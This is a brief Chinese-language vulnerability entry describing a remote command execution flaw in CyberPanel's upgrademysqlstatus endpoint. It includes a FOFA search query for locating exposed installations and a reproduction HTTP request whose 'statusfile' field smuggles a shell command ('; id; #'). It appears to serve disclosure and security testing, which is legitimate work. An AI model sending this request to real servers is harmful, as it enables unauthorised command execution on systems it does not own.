CyberPanel 存在远程命令执行漏洞
一、漏洞简介
CyberPanel 是一个开源的托管控制面板,它是为 VPS 和 Dedicated Servers 设计的,用于简化网站和服务的管理。它提供了易于使用的界面,允许用户进行各种服务器管理和网站托管任务,例如创建和管理网站、电子邮件账户、数据库和 DNS 记录。在upgrademysqlstatus接口可用过;拼接系统命令进行执行,造成命令执行漏洞
二、影响版本
- CyberPanel
三、资产测绘
- fofa
app="CyberPanel" - 特征
四、漏洞复现
OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/json
Connection: close
{"statusfile":"/dev/null; id; #"}